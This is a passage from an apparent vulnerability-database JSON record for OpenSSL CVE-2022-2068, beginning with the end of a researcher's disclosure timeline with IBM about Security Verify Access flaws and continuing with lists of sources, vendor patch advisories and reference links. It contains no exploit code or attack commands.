\"Authentication Bypass on IBM Security Verify Runtime\". \n* Feb 23, 2024: IBM confirmed the reception of the vulnerability and asked to close the ticket. \n* Feb 23, 2024: I said that since some vulnerabilities had not been patched, the ticket must stay open. \n* Feb 23, 2024: IBM said that they cannot keep the ticket open and they needed to close it. \n* Feb 23, 2024: I explained that the vulnerabilities were reported over a year ago and IBM confirmed they had not fully fixed in the latest version and that some vulnerabilities were also still under evaluation. I said that I would agree to close this ticket if IBM could confirm that all vulnerabilities reported in the ticket had been correctly fixed in the latest version. I also asked IBM to provide the corresponding security bulletins. \n* Feb 27, 2024: Regarding the authentication bypass, IBM replied that the runtime was supposed to be in the intranet zone. \n* Feb 28, 2024: I asked IBM to clarify where in the documentation specified that the runtime should not be exposed. For example, in https://www.ibm.com/docs/en/sva/10.0.7?topic=support-docker-image-verify-access-runtime, it was not explained that exposing this runtime on the network was a high security risk. \n* Mar 4, 2024: Regarding the vulnerabilities found in ibmsecurity, IBM said that any security vulnerability found in ibmsecurity must be reported by opening an issue in the Github repository. \n* Mar 8, 2024: IBM confirmed they were able to reproduce the authentication bypass vulnerability. \n* Mar 12, 2024: IBM confirmed they would add an optional MTLS authentication in the next release (10.0.8) and they would update the ISVA documentation to block any attempt of the authentication bypass vulnerability. \n* Mar 29, 2024: IBM published a new security bulletin: https://www.ibm.com/support/pages/node/7145400. \n* Mar 29, 2024: IBM confirmed that any security vulnerability found in ibmsecurity must be reported by opening an issue in the Github repository. \n* Apr 1, 2024: Creation of https://github.com/IBM-Security/ibmsecurity/issues/416. \n* Apr 2, 2024: IBM confirmed the reception of the report https://github.com/IBM-Security/ibmsecurity/issues/416#issuecomment-2032110397. \n* Apr 3, 2024: https://github.com/IBM-Security/ibmsecurity/issues/416 was entirely redacted by IBM. \n* Apr 5, 2024: I asked if the vulnerabilities would be patched in the #416 issue (https://github.com/IBM-Security/ibmsecurity/issues/416). \n* Apr 6, 2024: Issue #416 (https://github.com/IBM-Security/ibmsecurity/issues/416) closed. \n* Apr 6, 2024: I added again the content of https://github.com/IBM-Security/ibmsecurity/issues/416 and asked if CVEs would be published. \n* Apr 10, 2024: Security bulletin for ibm security published: https://www.ibm.com/support/pages/node/7147932. \n* Apr 10, 2024: I reached IBM regarding a new security bulletin, with a potential vulnerability I reported https://www.ibm.com/support/pages/node/7145828. \n* Apr 10, 2024: IBM said this security bulletin was unrelated to the vulnerabilities I reported. \n* Apr 15, 2024: IBM confirmed that the final vulnerabilities would be fixed in ISVA 10.0.8. \n* Apr 15, 2024: I provided a list of unfixed vulnerabilities and asked for more information. \n* Apr 16, 2024: IBM confirmed that all the unfixed vulnerabilities would be fixed in ISVA 10.0.8 and asked to close the ticket. \n* Apr 16, 2024: I confirmed that this ticket can be closed only when the security patches are available. \n* Apr 16, 2024: IBM confirmed they wanted to close the ticket because nothing would be updated before mid-2024. \n* Apr 17, 2024: I replied that \"It makes no sense to close this ticket until the vulnerabilities have been fixed. The fact that the vulnerabilities are fixed mid-year is a decision made by IBM. IBM was made aware of these vulnerabilities over a year ago, and yet we are still waiting for security patches. If this ticket is closed, I would consider that the vulnerabilities have been fixed and it is perfectly fine to publish the technical analysis.\"\n* May 6, 2024: IBM closed the existing ticket and opened new tickets for the remaining vulnerabilities. \n* May 6, 2024: I contacted IBM PSIRT asking if it was fine to publish the vulnerabilities since the ticket was closed by IBM. \n* May 7, 2024: I reopened the ticket stating that some of the patched vulnerabilities did not receive a CVE and there were also some unpatched vulnerabilities. I asked IBM to provide me with the CVE assigned to each vulnerability. I also asked IBM to confirm that, since this ticket had been closed by IBM, all the vulnerabilities had been fixed and that I would be able to publish the technical details. \n* May 8, 2024: IBM said they would review the list of vulnerabilities. \n* May 10, 2024: IBM PSIRT asked me not to publish technical details of unpatched vulnerabilities. \n* May 17, 2024: IBM provided me with an incomplete list of CVEs, with different vulnerabilities under the same CVE identifier and asked to close the ticket. \n* May 20, 2024: IBM asked for my comments on the list of CVEs. \n* May 20, 2024: I confirmed that several CVEs were missing and the list was incomplete. \n* May 21, 2024: IBM provided me with an explanation regarding the missing CVEs. \n* May 21, 2024: I asked IBM to quote their explanation in the security advisory. \n* May 21, 2024: IBM asked to have a meeting. \n* May 22, 2024: I replied that I would prefer written communication since it was very difficult to track the status of the vulnerabilities with (1) CVEs obtained only several months after the release of security bulletins, (2) tickets closed by IBM for unpatched vulnerabilities, (3) vulnerabilities in ibmsecurity which could be corrected by IBM and which could then no longer be managed by IBM, and (4) missing CVEs. \n* May 22, 2024: IBM asked to have a meeting to remove any confusion. \n* May 23, 2024: I replied that there\u0027s not much confusion except missing CVEs for silently patched vulnerabilities and lack of communication from IBM when releasing security patches. I asked IBM to share the CVEs with the corresponding vulnerabilities and indicate the security bulletins with the list of corresponding vulnerabilities. \n* May 24, 2024: IBM stated they would provide me with additional CVEs. \n* May 30, 2024: I confirmed that the creation of additional CVEs is fair. \n* Jun 2, 2024: IBM confirmed 3 new CVEs in a new security bulletin: https://www.ibm.com/support/pages/node/7155356. \n* Jun 3, 2024: I asked IBM the release date of the 10.0.8 version. \n* Jun 3, 2024: IBM confirmed that the exact date was not yet decided. \n* Jun 6, 2024: IBM asked if I had comments about the remaining vulnerabilities. \n* Jun 8, 2024: I asked IBM the status of a previously patched vulnerability. \n* Jun 10, 2024: IBM confirmed that this vulnerability had not been previously patched and would be patched in the 10.0.8 release. \n* Jun 11, 2024: IBM asked to create separate cases for the remaining vulnerabilities. \n* Jun 19, 2024: IBM asked if I needed assistance. \n* Jun 23, 2024: IBM confirmed that the 10.0.8 version was released and that they would close the ticket tracking the vulnerabilities. \n* Jun 26, 2024: I asked IBM to provide the corresponding CVEs and the link of the security bulletin. \n* Jun 27, 2024: IBM provided me with the link to the security bulletin: https://www.ibm.com/support/pages/node/7158790 and said that the 10.0.8 version was released with all the patched vulnerabilities. IBM closed the ticket. \n* Jul 3, 2024: I reopened the ticket and asked IBM to provide me with the list of vulnerabilities with the corresponding CVEs since I was not able to correctly map the CVEs to the vulnerabilities I reported. \n* Jul 8, 2024: IBM provided me with the list of CVEs. IBM closed the ticket. \n* Sep 7, 2024: I sent an email to IBM PSIRT stating that I was going to publish the security advisory and that some CVEs were still missing. I also stated that CVE-2023-38371 seemed to be an error since it was confirmed not to be a vulnerability according to our previous email exchanges. \n* Sep 9, 2024: I asked IBM to provide me with an official link regarding the runtime authentication bypass, to publish it in the security advisory. \n* Sep 13, 2024: IBM PSIRT provided me with (1) links regarding the runtime authentication bypass and (2) additional CVEs. They also confirmed that at least one vulnerability was not fixed and asked me not to disclose this finding until it was patched. No information was provided when this vulnerability would be patched. \n* Nov 1, 2024: A security advisory is published. \n\n\n\n## Credits\n\nThese vulnerabilities were found by Pierre Barre aka Pierre Kim (@PierreKimSec). \n\n\n\n## References\n\nhttps://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html\n\nhttps://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt\n\nhttps://pierrekim.github.io/blog/2024-11-01-ibmsecurity-4-vulnerabilities.html\n\nhttps://pierrekim.github.io/advisories/2024-ibmsecurity.txt\n\nhttps://www.ibm.com/support/pages/node/7106586\n\nhttps://www.ibm.com/support/pages/node/7145400\n\nhttps://www.ibm.com/support/pages/node/7155356\n\nhttps://www.ibm.com/support/pages/node/7158790\n\n\n\n## Disclaimer\n\nThis advisory is licensed under a Creative Commons Attribution Non-Commercial\nShare-Alike 3.0 License: http://creativecommons.org/licenses/by-nc-sa/3.0/\n\n-----BEGIN PGP SIGNATURE-----\n\niQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAmckrf4ACgkQxD4O2n2T\nLbzphQ//dkcrCH8Q+yNrjdYoxvY/wXwc1JfgXxmLK7Ns3N5qFJVT70Uea6HjIoHz\neJQurricioTP8jG48J2uzIt7l4G4Kgv0zP+aPN/KXjfYghu46N4G29458OgXTHVe\necOmouy/za1DG6qtST+sbicDhX5oku4VtdQ+NtDXaoLUAkADp/wJ3rLv5Fdw7gxQ\nVR0OMUTsy50Vv1bRN2R77ZAs/odAY67pQfTw8QpKLDDLBZveeAwBLgc66rQ+KZjq\nmPbLUULFlZp3+EYnR+XyZXu2nNGZDhTVMKAYCGzuqr3/boIz1BF7rifK07tL8+EE\n+NQQK3kzauWuQ/Sl5X20kfvdC91g7d/G93Me+Uz9iSfB9cyDfAdCLNf6fyYi/xjE\nqz6HNe2capSG7GBeCK6Q8ffb95kojjKrmyL2eKj2Yz5ZCWuDXa0L6pLwHZ9KSyjj\n24kykmiHI4bCKBCXazBVYcdguk+6PCcenAGxLIpKdmTcMvaUUbN/c2jUenjV8/As\n+akcA48mNjuITE+Qei9kn7R5huTSCZffws9j4r0P86dst0ZkYfNSWgThatk2NRwC\nV8D2DOXdxpXThuOAMfN4b9ViLYTeHm2/JGvl0RLQNyNSv2rWeeEch6Z69NsS/Fq7\nY7L55juYeCFtkTrdYA+tkaUHlvX8uQC9GoKkcUOfYV6utGQ4fnU=\n=3Ax6\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-2068"
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-2068"
      },
      {
        "db": "PACKETSTORM",
        "id": "168022"
      },
      {
        "db": "PACKETSTORM",
        "id": "169396"
      },
      {
        "db": "PACKETSTORM",
        "id": "168112"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "170196"
      },
      {
        "db": "PACKETSTORM",
        "id": "170165"
      },
      {
        "db": "PACKETSTORM",
        "id": "175432"
      },
      {
        "db": "PACKETSTORM",
        "id": "170179"
      },
      {
        "db": "PACKETSTORM",
        "id": "182466"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2022-2068",
        "trust": 2.0
      },
      {
        "db": "SIEMENS",
        "id": "SSA-332410",
        "trust": 1.1
      },
      {
        "db": "ICS CERT",
        "id": "ICSA-22-319-01",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2022-2068",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168022",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "169396",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "168112",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170741",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170196",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170165",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "175432",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "170179",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "182466",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-2068"
      },
      {
        "db": "PACKETSTORM",
        "id": "168022"
      },
      {
        "db": "PACKETSTORM",
        "id": "169396"
      },
      {
        "db": "PACKETSTORM",
        "id": "168112"
      },
      {
        "db": "PACKETSTORM",
        "id": "170741"
      },
      {
        "db": "PACKETSTORM",
        "id": "170196"
      },
      {
        "db": "PACKETSTORM",
        "id": "170165"
      },
      {
        "db": "PACKETSTORM",
        "id": "175432"
      },
      {
        "db": "PACKETSTORM",
        "id": "170179"
      },
      {
        "db": "PACKETSTORM",
        "id": "182466"
      },
      {
        "db": "NVD",
        "id": "CVE-2022-2068"
      }
    ]
  },
  "id": "VAR-202206-1428",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.416330645
  },
  "last_update_date": "2026-03-09T20:23:37.685000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Debian Security Advisories: DSA-5169-1 openssl -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=6b57464ee127384d3d853e9cc99cf350"
      },
      {
        "title": "Amazon Linux AMI: ALAS-2022-1626",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2022-1626"
      },
      {
        "title": "Debian CVElist Bug Report Logs: openssl: CVE-2022-2097",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=740b837c53d462fc86f3cb0849b86ca0"
      },
      {
        "title": "Arch Linux Issues: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2022-2068"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2022-1832",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1832"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2022-1831",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1831"
      },
      {
        "title": "Amazon Linux 2: ALASOPENSSL-SNAPSAFE-2023-001",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALASOPENSSL-SNAPSAFE-2023-001"
      },
      {
        "title": "Red Hat: ",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2022-2068"
      },
      {
        "title": "Red Hat: Moderate: Red Hat JBoss Web Server 5.7.1 release and security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228917 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat JBoss Web Server 5.7.1 release and security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228913 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: openssl security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225818 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Red Hat Satellite Client security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20235982 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: openssl security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226224 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Release of containers for OSP 16.2.z director operator tech preview",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226517 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Self Node Remediation Operator 0.4.1 security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226184 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Satellite 6.11.5.6 async security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20235980 - Security Advisory"
      },
      {
        "title": "Amazon Linux 2022: ALAS2022-2022-123",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-123"
      },
      {
        "title": "Red Hat: Important: Satellite 6.12.5.2 Async Security Update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20235979 - Security Advisory"
      },
      {
        "title": "Red Hat: Critical: Multicluster Engine for Kubernetes 2.0.2 security and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226422 - Security Advisory"
      },
      {
        "title": "Brocade Security Advisories: Access Denied",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=8efbc4133194fcddd0bca99df112b683"
      },
      {
        "title": "Red Hat: Moderate: OpenShift Container Platform 4.11.1 bug fix and security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226103 - Security Advisory"
      },
      {
        "title": "Amazon Linux 2022: ALAS2022-2022-195",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-195"
      },
      {
        "title": "Red Hat: Important: Node Maintenance Operator 4.11.1 security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226188 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Openshift Logging Security and Bug Fix update (5.3.11)",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226182 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Logging Subsystem 5.5.0 - Red Hat OpenShift security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226051 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat OpenShift Service Mesh 2.2.2 Containers security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226283 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Logging Subsystem 5.4.5 Security and Bug Fix Update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226183 - Security Advisory"
      },
      {
        "title": "Red Hat: Critical: Red Hat Advanced Cluster Management 2.5.2 security fixes and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226507 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: RHOSDT 2.6.0 operator/operand containers Security Update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227055 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: OpenShift sandboxed containers 1.3.1 security fix and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227058 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228840 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: New container image for Red Hat Ceph Storage 5.2 Security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226024 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: RHACS 3.72 enhancement and security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226714 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: OpenShift API for Data Protection (OADP) 1.1.0 security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226290 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Gatekeeper Operator v0.2 security and container updates",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226348 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Multicluster Engine for Kubernetes 2.1 security updates and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226345 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228841 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: RHSA: Submariner 0.13 - security and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226346 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: OpenShift API for Data Protection (OADP) 1.0.4 security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226430 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.6.0 security updates and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226370 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.3.12 security updates and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226271 - Security Advisory"
      },
      {
        "title": "Red Hat: Critical: Red Hat Advanced Cluster Management 2.4.6 security update and bug fixes",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226696 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Red Hat OpenShift Data Foundation 4.11.0 security, enhancement, \u0026 bugfix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226156 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: OpenShift Virtualization 4.11.1 security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228750 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: OpenShift Virtualization 4.11.0 Images security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226526 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: Migration Toolkit for Containers (MTC) 1.7.4 security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226429 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: OpenShift Virtualization 4.12.0 Images security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230408 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Openshift Logging 5.3.14 bug fix release and security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228889 - Security Advisory"
      },
      {
        "title": "Red Hat: Moderate: Logging Subsystem 5.5.5 - Red Hat OpenShift security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228781 - Security Advisory"
      },
      {
        "title": "Red Hat: Important: OpenShift Container Platform 4.11.0 bug fix and security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225069 - Security Advisory"
      },
      {
        "title": "Smart Check Scan-Report",
        "trust": 0.1,
        "url": "https://github.com/mawinkler/c1-cs-scan-result "
      },
      {
        "title": "Repository with scripts to verify system against CVE",
        "trust": 0.1,
        "url": "https://github.com/backloop-biz/Vulnerability_checker "
      },
      {
        "title": "https://github.com/jntass/TASSL-1.1.1",
        "trust": 0.1,
        "url": "https://github.com/jntass/TASSL-1.1.1 "
      },
      {
        "title": "Repository with scripts to verify system against CVE",
        "trust": 0.1,
        "url": "https://github.com/backloop-biz/CVE_checks "
      },
      {
        "title": "https://github.com/tianocore-docs/ThirdPartySecurityAdvisories",
        "trust": 0.1,
        "url": "https://github.com/tianocore-docs/ThirdPartySecurityAdvisories "
      },
      {
        "title": "OpenSSL-CVE-lib",
        "trust": 0.1,
        "url": "https://github.com/chnzzh/OpenSSL-CVE-lib "
      },
      {
        "title": "The Register",
        "trust": 0.1,
        "url": "https://www.theregister.co.uk/2022/06/27/openssl_304_memory_corruption_bug/"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2022-2068"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-78",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2022-2068"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 1.2,
        "url": "https://www.debian.org/security/2022/dsa-5169"
      },
      {
        "trust": 1.1,
        "url": "https://www.openssl.org/news/secadv/20220621.txt"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20220707-0008/"
      },
      {
        "trust": 1.1,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf"
      },
      {
        "trust": 1.1,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=2c9c35870601b4a44d86ddbf512b38df38285cfa"
      },
      {
        "trust": 1.1,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=9639817dac8bbbaa64d09efad7464ccc405527c7"
      },
      {
        "trust": 1.1,
        "url": "https://git.openssl.org/gitweb/?p=openssl.git%3ba=commitdiff%3bh=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6wzzbkuhqfgskgnxxkicsrpl7amvw5m5/"
      },
      {
        "trust": 1.1,
        "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/vcmnwkerpbkoebnl7clttx3zzczlh7xa/"
      },
      {
        "trust": 1.0,
        "url": "https://gitlab.com/fraf0/cve-2022-1292-re_score-analysis"
      },
      {
        "trust": 1.0,
        "url": "http://seclists.org/fulldisclosure/2024/nov/0"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2068"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1292"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2022-1292"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2022-2068"
      },
      {
        "trust": 0.6,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.6,
        "url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-2097"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1586"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1785"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1897"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2022-1927"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-2097"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1586"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#moderate"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/cve/cve-2022-37434"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1897"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1927"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2022-1785"
      },
      {
        "trust": 0.2,
        "url": "https://issues.jboss.org/):"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2021-38561"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-30631"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-38561"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-26716"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-27406"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-30293"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35525"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-40674"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22624"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-34903"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2022-22662"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2020-35527"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2016-3709"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-3709"
      },
      {
        "trust": 0.2,
